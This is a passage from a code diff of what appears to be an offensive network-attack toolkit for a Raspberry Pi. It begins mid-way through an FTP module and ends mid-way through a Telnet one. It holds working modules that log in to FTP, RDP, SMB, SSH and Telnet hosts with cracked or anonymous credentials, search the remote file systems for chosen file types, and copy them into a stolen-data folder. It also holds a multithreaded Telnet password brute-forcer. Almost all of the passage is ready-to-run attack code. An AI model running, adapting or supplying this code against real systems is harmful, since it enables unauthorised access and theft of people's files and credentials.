self.shared_data = shared_data
self.ftp_connected = False
self.stop_execution = False
logger.info("StealFilesFTP initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def connect_ftp(self, ip, username, password):
"""
Establish an FTP connection.
"""
try:
ftp = FTP()
ftp.connect(ip, 21)
ftp.login(user=username, passwd=password)
self.ftp_connected = True
logger.info(f"Connected to {ip} via FTP with username {username}")
return ftp
except Exception as e:
logger.error(f"FTP connection error for {ip} with user '{username}' and password '{password}': {e}")
return None
def find_files(self, ftp, dir_path):
"""
Find files in the FTP share based on the configuration criteria.
"""
files = []
try:
ftp.cwd(dir_path)
items = ftp.nlst()
for item in items:
try:
ftp.cwd(item)
files.extend(self.find_files(ftp, os.path.join(dir_path, item)))
ftp.cwd('..')
except Exception:
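# cwd() raising is treated as "this item is a file": apply the extension and filename filters to it.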
if any(item.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in item for file_name in self.shared_data.steal_file_names):
files.append(os.path.join(dir_path, item))
logger.info(f"Found {len(files)} matching files in {dir_path} on FTP")
except Exception as e:
logger.error(f"Error accessing path {dir_path} on FTP: {e}")
return files
def steal_file(self, ftp, remote_file, local_dir):
"""
Download a file from the FTP server to the local directory.
"""
try:
local_file_path = os.path.join(local_dir, os.path.relpath(remote_file, '/'))
local_file_dir = os.path.dirname(local_file_path)
os.makedirs(local_file_dir, exist_ok=True)
with open(local_file_path, 'wb') as f:
ftp.retrbinary(f'RETR {remote_file}', f.write)
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
except Exception as e:
logger.error(f"Error downloading file {remote_file} from FTP: {e}")
def execute(self, ip, port, row, status_key):
"""
Steal files from the FTP server.
"""
try:
if 'success' in row.get(self.b_parent_action, ''): # Verify if the parent action is successful
self.shared_data.bjornorch_status = "StealFilesFTP"
logger.info(f"Stealing files from {ip}:{port}...")
# Wait a bit because it's too fast to see the status change
time.sleep(5)
# Get FTP credentials from the cracked passwords file
ftpfile = self.shared_data.ftpfile
credentials = []
if os.path.exists(ftpfile):
with open(ftpfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
credentials.append((parts[3], parts[4])) # Username and password
logger.info(f"Found {len(credentials)} credentials for {ip}")
def try_anonymous_access():
"""
Try to access the FTP server without credentials.
"""
try:
ftp = self.connect_ftp(ip, 'anonymous', '')
return ftp
except Exception as e:
logger.info(f"Anonymous access to {ip} failed: {e}")
return None
if not credentials and not try_anonymous_access():
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def timeout():
"""
Timeout function to stop the execution if no FTP connection is established.
"""
if not self.ftp_connected:
logger.error(f"No FTP connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer.start()
# Attempt anonymous access first
success = False
ftp = try_anonymous_access()
if ftp:
remote_files = self.find_files(ftp, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"ftp/{mac}_{ip}/anonymous")
if remote_files:
for remote_file in remote_files:
if self.stop_execution:
break
self.steal_file(ftp, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} via anonymous access")
ftp.quit()
if success:
timer.cancel() # Cancel the timer if the operation is successful
# Attempt to steal files using each credential if anonymous access fails
for username, password in credentials:
if self.stop_execution:
break
try:
logger.info(f"Trying credential {username}:{password} for {ip}")
ftp = self.connect_ftp(ip, username, password)
if ftp:
remote_files = self.find_files(ftp, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"ftp/{mac}_{ip}/{username}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution:
break
self.steal_file(ftp, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.info(f"Successfully stolen {countfiles} files from {ip}:{port} with user '{username}'")
ftp.quit()
if success:
timer.cancel() # Cancel the timer if the operation is successful
break # Exit the loop as we have found valid credentials
except Exception as e:
logger.error(f"Error stealing files from {ip} with user '{username}': {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
return 'success'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_ftp = StealFilesFTP(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")

184
actions/steal_files_rdp.py Normal file
View File

@@ -0,0 +1,184 @@
"""
steal_files_rdp.py - This script connects to remote RDP servers using provided credentials, searches for specific files, and downloads them to a local directory.
"""
import os
import subprocess
import logging
import time
from threading import Timer
from rich.console import Console
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_rdp.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesRDP"
b_module = "steal_files_rdp"
b_status = "steal_files_rdp"
b_parent = "RDPBruteforce"
b_port = 3389
class StealFilesRDP:
"""
Class to handle the process of stealing files from RDP servers.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.rdp_connected = False
self.stop_execution = False
logger.info("StealFilesRDP initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def connect_rdp(self, ip, username, password):
"""
Establish an RDP connection.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("RDP connection attempt interrupted due to orchestrator exit.")
return None
command = f"xfreerdp /v:{ip} /u:{username} /p:{password} /drive:shared,/mnt/shared"
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
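# communicate() blocks until the xfreerdp process exits, so this call only returns once the RDP session has ended.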
if process.returncode == 0:
logger.info(f"Connected to {ip} via RDP with username {username}")
self.rdp_connected = True
return process
else:
logger.error(f"Error connecting to RDP on {ip} with username {username}: {stderr.decode()}")
return None
except Exception as e:
logger.error(f"Error connecting to RDP on {ip} with username {username}: {e}")
return None
def find_files(self, client, dir_path):
"""
Find files in the remote directory based on the configuration criteria.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted due to orchestrator exit.")
return []
# Assuming that files are mounted and can be accessed via SMB or locally
files = []
for root, dirs, filenames in os.walk(dir_path):
for file in filenames:
if any(file.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in file for file_name in self.shared_data.steal_file_names):
files.append(os.path.join(root, file))
logger.info(f"Found {len(files)} matching files in {dir_path}")
return files
except Exception as e:
logger.error(f"Error finding files in directory {dir_path}: {e}")
return []
def steal_file(self, remote_file, local_dir):
"""
Download a file from the remote server to the local directory.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("File stealing process interrupted due to orchestrator exit.")
return
local_file_path = os.path.join(local_dir, os.path.basename(remote_file))
os.makedirs(os.path.dirname(local_file_path), exist_ok=True)
command = f"cp {remote_file} {local_file_path}"
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if process.returncode == 0:
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
else:
logger.error(f"Error downloading file {remote_file}: {stderr.decode()}")
except Exception as e:
logger.error(f"Error stealing file {remote_file}: {e}")
def execute(self, ip, port, row, status_key):
"""
Steal files from the remote server using RDP.
"""
try:
if 'success' in row.get(self.b_parent_action, ''): # Verify if the parent action is successful
self.shared_data.bjornorch_status = "StealFilesRDP"
# Wait a bit because it's too fast to see the status change
time.sleep(5)
logger.info(f"Stealing files from {ip}:{port}...")
# Get RDP credentials from the cracked passwords file
rdpfile = self.shared_data.rdpfile
credentials = []
if os.path.exists(rdpfile):
with open(rdpfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
credentials.append((parts[3], parts[4]))
logger.info(f"Found {len(credentials)} credentials for {ip}")
if not credentials:
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def timeout():
"""
Timeout function to stop the execution if no RDP connection is established.
"""
if not self.rdp_connected:
logger.error(f"No RDP connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer.start()
# Attempt to steal files using each credential
success = False
for username, password in credentials:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Steal files execution interrupted due to orchestrator exit.")
break
try:
logger.info(f"Trying credential {username}:{password} for {ip}")
client = self.connect_rdp(ip, username, password)
if client:
remote_files = self.find_files(client, '/mnt/shared')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"rdp/{mac}_{ip}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("File stealing process interrupted due to orchestrator exit.")
break
self.steal_file(remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} using {username}")
client.terminate()
if success:
timer.cancel() # Cancel the timer if the operation is successful
return 'success' # Return success if the operation is successful
except Exception as e:
logger.error(f"Error stealing files from {ip} with username {username}: {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
logger.error(f"Parent action not successful for {ip}. Skipping steal files action.")
return 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_rdp = StealFilesRDP(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")

223
actions/steal_files_smb.py Normal file
View File

@@ -0,0 +1,223 @@
import os
import logging
from rich.console import Console
from threading import Timer
import time
from smb.SMBConnection import SMBConnection
from smb.base import SharedFile
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_smb.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesSMB"
b_module = "steal_files_smb"
b_status = "steal_files_smb"
b_parent = "SMBBruteforce"
b_port = 445
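# Administrative and system shares that are never crawled; the last few entries look like artifacts of a parsed share listing.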
IGNORED_SHARES = {'print$', 'ADMIN$', 'IPC$', 'C$', 'D$', 'E$', 'F$', 'Sharename', '---------', 'SMB1'}
class StealFilesSMB:
"""
Class to handle the process of stealing files from SMB shares.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.smb_connected = False
self.stop_execution = False
logger.info("StealFilesSMB initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def connect_smb(self, ip, username, password):
"""
Establish an SMB connection.
"""
try:
conn = SMBConnection(username, password, "Bjorn", "Target", use_ntlm_v2=True, is_direct_tcp=True)
conn.connect(ip, 445)
logger.info(f"Connected to {ip} via SMB with username {username}")
self.smb_connected = True
return conn
except Exception as e:
logger.error(f"SMB connection error for {ip} with user '{username}' and password '{password}': {e}")
return None
def find_files(self, conn, share_name, dir_path):
"""
Find files in the SMB share based on the configuration criteria.
"""
files = []
try:
for file in conn.listPath(share_name, dir_path):
if file.isDirectory:
if file.filename not in ['.', '..']:
files.extend(self.find_files(conn, share_name, os.path.join(dir_path, file.filename)))
else:
if any(file.filename.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in file.filename for file_name in self.shared_data.steal_file_names):
files.append(os.path.join(dir_path, file.filename))
logger.info(f"Found {len(files)} matching files in {dir_path} on share {share_name}")
except Exception as e:
logger.error(f"Error accessing path {dir_path} in share {share_name}: {e}")
return files
def steal_file(self, conn, share_name, remote_file, local_dir):
"""
Download a file from the SMB share to the local directory.
"""
try:
local_file_path = os.path.join(local_dir, os.path.relpath(remote_file, '/'))
local_file_dir = os.path.dirname(local_file_path)
os.makedirs(local_file_dir, exist_ok=True)
with open(local_file_path, 'wb') as f:
conn.retrieveFile(share_name, remote_file, f)
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
except Exception as e:
logger.error(f"Error downloading file {remote_file} from share {share_name}: {e}")
def list_shares(self, conn):
"""
List shares using the SMBConnection object.
"""
try:
shares = conn.listShares()
valid_shares = [share for share in shares if share.name not in IGNORED_SHARES and not share.isSpecial and not share.isTemporary]
logger.info(f"Found valid shares: {[share.name for share in valid_shares]}")
return valid_shares
except Exception as e:
logger.error(f"Error listing shares: {e}")
return []
def execute(self, ip, port, row, status_key):
"""
Steal files from the SMB share.
"""
try:
if 'success' in row.get(self.b_parent_action, ''): # Verify if the parent action is successful
self.shared_data.bjornorch_status = "StealFilesSMB"
logger.info(f"Stealing files from {ip}:{port}...")
# Wait a bit because it's too fast to see the status change
time.sleep(5)
# Get SMB credentials from the cracked passwords file
smbfile = self.shared_data.smbfile
credentials = {}
if os.path.exists(smbfile):
with open(smbfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
share = parts[3]
user = parts[4]
password = parts[5]
if share not in credentials:
credentials[share] = []
credentials[share].append((user, password))
logger.info(f"Found credentials for {len(credentials)} shares on {ip}")
def try_anonymous_access():
"""
Try to access SMB shares without credentials.
"""
try:
conn = self.connect_smb(ip, '', '')
shares = self.list_shares(conn)
return conn, shares
except Exception as e:
logger.info(f"Anonymous access to {ip} failed: {e}")
return None, None
if not credentials and not try_anonymous_access()[0]:  # try_anonymous_access() returns a (conn, shares) tuple, so test the connection itself
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def timeout():
"""
Timeout function to stop the execution if no SMB connection is established.
"""
if not self.smb_connected:
logger.error(f"No SMB connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer.start()
# Attempt anonymous access first
success = False
conn, shares = try_anonymous_access()
if conn and shares:
for share in shares:
if share.isSpecial or share.isTemporary or share.name in IGNORED_SHARES:
continue
remote_files = self.find_files(conn, share.name, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"smb/{mac}_{ip}/{share.name}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution:
break
self.steal_file(conn, share.name, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} via anonymous access")
conn.close()
if success:
timer.cancel() # Cancel the timer if the operation is successful
# Track which shares have already been accessed anonymously
attempted_shares = {share.name for share in shares} if success else set()
# Attempt to steal files using each credential for shares not accessed anonymously
for share, creds in credentials.items():
if share in attempted_shares or share in IGNORED_SHARES:
continue
for username, password in creds:
if self.stop_execution:
break
try:
logger.info(f"Trying credential {username}:{password} for share {share} on {ip}")
conn = self.connect_smb(ip, username, password)
if conn:
remote_files = self.find_files(conn, share, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"smb/{mac}_{ip}/{share}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution:
break
self.steal_file(conn, share, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.info(f"Successfully stolen {countfiles} files from {ip}:{port} on share '{share}' with user '{username}'")
conn.close()
if success:
timer.cancel() # Cancel the timer if the operation is successful
break # Exit the loop as we have found valid credentials
except Exception as e:
logger.error(f"Error stealing files from {ip} on share '{share}' with user '{username}': {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
return 'success'
else:
logger.error(f"Parent action not successful for {ip}. Skipping steal files action.")
return 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_smb = StealFilesSMB(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")

173
actions/steal_files_ssh.py Normal file
View File

@@ -0,0 +1,173 @@
"""
steal_files_ssh.py - This script connects to remote SSH servers using provided credentials, searches for specific files, and downloads them to a local directory.
"""
import os
import paramiko
import logging
import time
from rich.console import Console
from threading import Timer
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_ssh.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesSSH"
b_module = "steal_files_ssh"
b_status = "steal_files_ssh"
b_parent = "SSHBruteforce"
b_port = 22
class StealFilesSSH:
"""
Class to handle the process of stealing files from SSH servers.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.sftp_connected = False
self.stop_execution = False
logger.info("StealFilesSSH initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def connect_ssh(self, ip, username, password):
"""
Establish an SSH connection.
"""
try:
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(ip, username=username, password=password)
logger.info(f"Connected to {ip} via SSH with username {username}")
return ssh
except Exception as e:
logger.error(f"Error connecting to SSH on {ip} with username {username}: {e}")
raise
def find_files(self, ssh, dir_path):
"""
Find files in the remote directory based on the configuration criteria.
"""
try:
stdin, stdout, stderr = ssh.exec_command(f'find {dir_path} -type f')
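# Note: find walks the whole remote tree from dir_path; permission errors end up on stderr and are ignored here.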
files = stdout.read().decode().splitlines()
matching_files = []
for file in files:
if self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted.")
return []
if any(file.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in file for file_name in self.shared_data.steal_file_names):
matching_files.append(file)
logger.info(f"Found {len(matching_files)} matching files in {dir_path}")
return matching_files
except Exception as e:
logger.error(f"Error finding files in directory {dir_path}: {e}")
raise
def steal_file(self, ssh, remote_file, local_dir):
"""
Download a file from the remote server to the local directory.
"""
try:
sftp = ssh.open_sftp()
self.sftp_connected = True # Mark SFTP as connected
remote_dir = os.path.dirname(remote_file)
local_file_dir = os.path.join(local_dir, os.path.relpath(remote_dir, '/'))
os.makedirs(local_file_dir, exist_ok=True)
local_file_path = os.path.join(local_file_dir, os.path.basename(remote_file))
sftp.get(remote_file, local_file_path)
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
sftp.close()
except Exception as e:
logger.error(f"Error stealing file {remote_file}: {e}")
raise
def execute(self, ip, port, row, status_key):
"""
Steal files from the remote server using SSH.
"""
try:
if 'success' in row.get(self.b_parent_action, ''): # Verify if the parent action is successful
self.shared_data.bjornorch_status = "StealFilesSSH"
# Wait a bit because it's too fast to see the status change
time.sleep(5)
logger.info(f"Stealing files from {ip}:{port}...")
# Get SSH credentials from the cracked passwords file
sshfile = self.shared_data.sshfile
credentials = []
if os.path.exists(sshfile):
with open(sshfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
credentials.append((parts[3], parts[4]))
logger.info(f"Found {len(credentials)} credentials for {ip}")
if not credentials:
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def timeout():
"""
Timeout function to stop the execution if no SFTP connection is established.
"""
if not self.sftp_connected:
logger.error(f"No SFTP connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer.start()
# Attempt to steal files using each credential
success = False
for username, password in credentials:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted.")
break
try:
logger.info(f"Trying credential {username}:{password} for {ip}")
ssh = self.connect_ssh(ip, username, password)
remote_files = self.find_files(ssh, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"ssh/{mac}_{ip}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted.")
break
self.steal_file(ssh, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} using {username}")
ssh.close()
if success:
timer.cancel() # Cancel the timer if the operation is successful
return 'success' # Return success if the operation is successful
except Exception as e:
logger.error(f"Error stealing files from {ip} with username {username}: {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
logger.error(f"Parent action not successful for {ip}. Skipping steal files action.")
return 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_ssh = StealFilesSSH(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")

180
actions/steal_files_telnet.py Normal file
View File

@@ -0,0 +1,180 @@
"""
steal_files_telnet.py - This script connects to remote Telnet servers using provided credentials, searches for specific files, and downloads them to a local directory.
"""
import os
import telnetlib
import logging
import time
from rich.console import Console
from threading import Timer
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_telnet.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesTelnet"
b_module = "steal_files_telnet"
b_status = "steal_files_telnet"
b_parent = "TelnetBruteforce"
b_port = 23
class StealFilesTelnet:
"""
Class to handle the process of stealing files from Telnet servers.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.telnet_connected = False
self.stop_execution = False
logger.info("StealFilesTelnet initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def connect_telnet(self, ip, username, password):
"""
Establish a Telnet connection.
"""
try:
tn = telnetlib.Telnet(ip)
tn.read_until(b"login: ")
tn.write(username.encode('ascii') + b"\n")
if password:
tn.read_until(b"Password: ")
tn.write(password.encode('ascii') + b"\n")
tn.read_until(b"$", timeout=10)
logger.info(f"Connected to {ip} via Telnet with username {username}")
return tn
except Exception as e:
logger.error(f"Telnet connection error for {ip} with user '{username}' & password '{password}': {e}")
return None
def find_files(self, tn, dir_path):
"""
Find files in the remote directory based on the config criteria.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted due to orchestrator exit.")
return []
tn.write(f'find {dir_path} -type f\n'.encode('ascii'))
files = tn.read_until(b"$", timeout=10).decode('ascii').splitlines()
matching_files = []
for file in files:
if self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted due to orchestrator exit.")
return []
if any(file.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in file for file_name in self.shared_data.steal_file_names):
matching_files.append(file.strip())
logger.info(f"Found {len(matching_files)} matching files in {dir_path}")
return matching_files
except Exception as e:
logger.error(f"Error finding files on Telnet: {e}")
return []
def steal_file(self, tn, remote_file, local_dir):
"""
Download a file from the remote server to the local directory.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("File stealing process interrupted due to orchestrator exit.")
return
local_file_path = os.path.join(local_dir, os.path.relpath(remote_file, '/'))
local_file_dir = os.path.dirname(local_file_path)
os.makedirs(local_file_dir, exist_ok=True)
with open(local_file_path, 'wb') as f:
tn.write(f'cat {remote_file}\n'.encode('ascii'))
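# The captured bytes typically include the echoed command and the trailing prompt, since everything up to the next "$" is written as-is.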
f.write(tn.read_until(b"$", timeout=10))
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
except Exception as e:
logger.error(f"Error downloading file {remote_file} from Telnet: {e}")
def execute(self, ip, port, row, status_key):
"""
Steal files from the remote server using Telnet.
"""
try:
if 'success' in row.get(self.b_parent_action, ''): # Verify if the parent action is successful
self.shared_data.bjornorch_status = "StealFilesTelnet"
logger.info(f"Stealing files from {ip}:{port}...")
# Wait a bit because it's too fast to see the status change
time.sleep(5)
# Get Telnet credentials from the cracked passwords file
telnetfile = self.shared_data.telnetfile
credentials = []
if os.path.exists(telnetfile):
with open(telnetfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
credentials.append((parts[3], parts[4]))
logger.info(f"Found {len(credentials)} credentials for {ip}")
if not credentials:
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def timeout():
"""
Timeout function to stop the execution if no Telnet connection is established.
"""
if not self.telnet_connected:
logger.error(f"No Telnet connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer.start()
# Attempt to steal files using each credential
success = False
for username, password in credentials:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Steal files execution interrupted due to orchestrator exit.")
break
try:
logger.info(f"Trying credential {username}:{password} for {ip}")
tn = self.connect_telnet(ip, username, password)
if tn:
remote_files = self.find_files(tn, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"telnet/{mac}_{ip}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("File stealing process interrupted due to orchestrator exit.")
break
self.steal_file(tn, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} using {username}")
tn.close()
if success:
timer.cancel() # Cancel the timer if the operation is successful
return 'success' # Return success if the operation is successful
except Exception as e:
logger.error(f"Error stealing files from {ip} with user '{username}': {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
logger.error(f"Parent action not successful for {ip}. Skipping steal files action.")
return 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_telnet = StealFilesTelnet(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")

206
actions/telnet_connector.py Normal file
View File

@@ -0,0 +1,206 @@
"""
telnet_connector.py - This script performs a brute-force attack on Telnet servers using a list of credentials,
and logs the successful login attempts.
"""
import os
import pandas as pd
import telnetlib
import threading
import logging
import time
from queue import Queue
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="telnet_connector.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "TelnetBruteforce"
b_module = "telnet_connector"
b_status = "brute_force_telnet"
b_port = 23
b_parent = None
class TelnetBruteforce:
"""
Class to handle the brute-force attack process for Telnet servers.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.telnet_connector = TelnetConnector(shared_data)
logger.info("TelnetConnector initialized.")
def bruteforce_telnet(self, ip, port):
"""
Perform brute-force attack on a Telnet server.
"""
return self.telnet_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute-force attack.
"""
self.shared_data.bjornorch_status = "TelnetBruteforce"
success, results = self.bruteforce_telnet(ip, port)
return 'success' if success else 'failed'
class TelnetConnector:
"""
Class to handle Telnet connections and credential testing.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("23", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.telnetfile = shared_data.telnetfile
# If the file does not exist, it will be created
if not os.path.exists(self.telnetfile):
logger.info(f"File {self.telnetfile} does not exist. Creating...")
with open(self.telnetfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,User,Password,Port\n")
self.results = [] # List to store results temporarily
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for Telnet ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("23", na=False)]
def telnet_connect(self, adresse_ip, user, password):
"""
Establish a Telnet connection and try to log in with the provided credentials.
"""
try:
tn = telnetlib.Telnet(adresse_ip)
tn.read_until(b"login: ", timeout=5)
tn.write(user.encode('ascii') + b"\n")
if password:
tn.read_until(b"Password: ", timeout=5)
tn.write(password.encode('ascii') + b"\n")
# Wait to see if the login was successful
time.sleep(2)
response = tn.expect([b"Login incorrect", b"Password: ", b"$ ", b"# "], timeout=5)
tn.close()
# Check if the login was successful
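# expect() returns (index, match, data); index 2 ("$ ") or 3 ("# ") means a shell prompt was reached.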
if response[0] == 2 or response[0] == 3:
return True
except Exception:
pass
return False
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
if self.telnet_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP: {adresse_ip} | User: {user} | Password: {password}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
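"""
Queue every user/password combination for the target, then drain the queue with worker threads while a progress bar tracks the attempts.
"""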
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing Telnet...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
